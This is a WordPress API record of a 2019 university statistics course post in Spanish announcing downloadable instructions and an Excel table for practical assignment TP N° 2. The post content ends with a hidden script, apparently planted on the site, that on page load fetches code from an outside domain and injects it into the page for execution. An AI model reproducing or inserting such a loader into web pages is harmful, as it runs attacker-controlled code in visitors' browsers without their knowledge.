{"id":313,"date":"2019-05-30T11:48:55","date_gmt":"2019-05-30T14:48:55","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=313"},"modified":"2025-06-21T12:13:24","modified_gmt":"2025-06-21T15:13:24","slug":"habilitada-la-descarga-del-tp-n-2","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/05\/30\/habilitada-la-descarga-del-tp-n-2\/","title":{"rendered":"Habilitada la Descarga del TP N\u00b0 2 &#8211;"},"content":{"rendered":"\n<p>Ya est\u00e1 habilitada la descarga de las consignas del TP N\u00b0 2 y la tabla excel con los datos para trabajar el pr\u00e1ctico.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a rel=\"noreferrer noopener\" aria-label=\"Consigna TP N\u00b0 2 (abre en una nueva pesta\u00f1a)\" href=\"https:\/\/drive.google.com\/open?id=1h8uunABKvYGJDs56nuVWjYrd6-ji0Btw\" target=\"_blank\">Consigna TP N\u00b0 2<\/a><\/li><li><a href=\"https:\/\/drive.google.com\/open?id=1MPK7wPgX9WTYutgNMKfrKKZjMmpCsu1V\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"Tabla Excel TP N\u00b0 2 (abre en una nueva pesta\u00f1a)\">Tabla Excel TP N\u00b0 2<\/a><\/li><\/ul>\n\n\n\n<p>El pr\u00e1ctico es el mismo tanto para los alumnos de dise\u00f1o industrial como para los de dise\u00f1o gr\u00e1fico.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-very-dark-gray-color has-luminous-vivid-amber-background-color\"><strong> La fecha de entre el el jueves 06\/06 a las 15hs por el gabinete de Matem\u00e1tica y Estad\u00edstica de la FAUD<\/strong>.<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Ya est\u00e1 habilitada la descarga de las consignas del TP N\u00b0 2 y la tabla excel con los datos para trabajar el pr\u00e1ctico. Consigna TP N\u00b0 2 Tabla Excel TP N\u00b0 2 El pr\u00e1ctico es el mismo tanto para los alumnos de dise\u00f1o industrial como para los de dise\u00f1o gr\u00e1fico. La fecha de entre el<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/05\/30\/habilitada-la-descarga-del-tp-n-2\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,16,9,7,18],"tags":[],"class_list":["post-313","post","type-post","status-publish","format-standard","hentry","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud","category-trabajos-practicos"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=313"}],"version-history":[{"count":5,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/313\/revisions"}],"predecessor-version":[{"id":873,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/313\/revisions\/873"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}